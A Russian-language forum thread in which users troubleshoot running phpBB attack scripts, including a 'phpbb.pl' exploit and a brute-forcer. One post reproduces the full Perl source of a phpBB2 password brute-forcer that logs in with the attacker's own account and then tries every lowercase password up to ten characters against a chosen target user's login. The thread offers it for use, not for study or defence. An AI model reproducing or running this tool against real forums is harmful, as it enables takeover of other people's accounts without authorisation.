конечно существуетюзай поиск сдесь K1borg писал вот ссылко http://forum.antichat.ru/showpost.php?p=474307&postcount=7 ЗЫ и впредь ЮЗЬ поиск
тоже попробовал - давно юзаю этот .pl, но именно с брутом непонятки - зарегился на форуме, сделал в той же папке, где и phpbb.pl файл pass.txt, в нем ТОЛЬКО один мой пароль (правильный), запускаю, начинается брут, НО РЕЗУЛЬТАТЫ никуда не сохраняются и в процессе работы ничего не показывается (т.е. в других режимах все пишется в log.txt - а в режиме брута вообще трудно понять, делается ли что-нибудь в принципе, и если есть ошибки - то какие. Запускаю так (чтобы все видно было): cmd /k C:\Perl\bin\wperl.exe C:\Perl\bin\Sploits\phpbb.pl -v3 -uhttp://forum/index.php -lVassia -fpass.txt т.е. брут не работает, или где? Версия форума 2.020 Инфо о форуме включая серверный путь успешно выдрал. При сканировании неподдерживаемых версий форума скрипт в лог все-равно пишет "ну не могу я поломать". А тут тишина.
Code: #!/usr/bin/perl use IO::Socket; use LWP::UserAgent; use HTTP::Cookies; use Time::HiRes qw(gettimeofday); $host = $ARGV[0]; $usern = $ARGV[1]; $passw = $ARGV[2]; $uname = $ARGV[3]; $url = "http://".$host; $alpha = "abcdefghijklmnopqrstuvwxyz"; #charset $charcount = 24; #number of chars in $alpha $dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds. $count = 0; $logins = 0; $minchars = 1; #min chars $maxchars = 10; #max chars print q( ########################################################### # phpBB2 brute forcer # # http://www.unnamedone.com # # [email protected] # # 12 - April - 2008 # ################## Coded By UnnamedOne #################### ); if (@ARGV < 4) { print " # I am not responsible for anything that you do with this!\n"; print " # This has been tested on phpBB2!\n"; print " # usage : phpbb2.pl [host & path] [user] [pass] [target]\n"; print " # E.g : phpbb2.pl www.milw0rm.com/phpBB2/ UnnamedOne MyPass str0ke\n"; exit(); } fakelogin(); for(my $t=$minchars;$t<=$maxchars;$t++) { crack($t); } sub fakelogin { $xplr = LWP::UserAgent->new() or die; $cookie_jarr = HTTP::Cookies->new(); $xplr->cookie_jar( $cookie_jarr ); $resr = $xplr->post($url.'login.php', Content => [ "username" => "$usern", "password" => "$passw", "login" => "Log in", "newregister" => "Register", ],); if($cookie_jarr->as_string =~ /%22%3B%7D/) { #Do nothing.. } else { print $cookie_jarr->as_string; print "Forum not vulnerable or wrong username / password.\n"; exit(); } } sub crack { $xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new(); $CharSet = shift; @RawString = (); for (my $i =0;$i<$CharSet;$i++) { $RawString[i] = 0; } $Start = gettimeofday(); do { for (my $i =0;$i<$CharSet;$i++) { if ($RawString[$i] > length($alpha)-1) { if ($i==$CharSet-1) { $cnt = 0; return false; } $RawString[$i+1]++; $RawString[$i]=0; } } $ret = ""; for (my $i =0;$i<$CharSet;$i++) { $ret = $ret . substr($alpha,$RawString[$i],1); } $count++; if($count == 4) { #fakelogin(); $count = 0; } $xpl->cookie_jar( $cookie_jar ); $res = $xpl->post($url.'login.php', Content => [ "username" => "$uname", "password" => "$ret", "login" => "Log in", "newregister" => "Register", ],); $cnt++; $Stop = gettimeofday(); if ($Stop-$Start>$dbgtmr) { $cnt = int($cnt/$dbgtmr); $Start = gettimeofday(); } $logins++; system("clear"); $pro = ($logins / ($charcount * $maxchars)); print "Current password: $ret\n"; print "Login attempts: $logins\n"; print "Cracking speed: $cnt passwords/sec\n"; print "$pro% finished.\n"; $cnt = 0; if($cookie_jar->as_string =~ /%22%3B%7D/) { print "Password cracked! => $ret\n"; exit(); } $RawString[0]++; }while($RawString[$CharSet-1]<length($alpha)); }
Если не трудно, как расшифровать эту строчку: usage : phpbb2.pl [host & path] [user] [pass] [target]\n В принципе понятно, только непонятно откуда что берется И особенно с target непонятно. Здесь вообще брут по словарю одного юзера или что? Запускаю - ноль эмоций, ни сообщений об ошибке, ничего вообще Я понимаю, что пример есть: E.g : phpbb2.pl www.milw0rm.com/phpBB2/ UnnamedOne MyPass str0ke\n что такое в данном случае UnnamedOne, MyPass и str0ke\n??? Имя юзера какого-то, какой-то мой Пароль и строка какая-то
брут хорошо работает, а вот врубил -v1 , и что вот это значит DEBUG: forum_id: [54] DEBUG: topic_id: [15068]
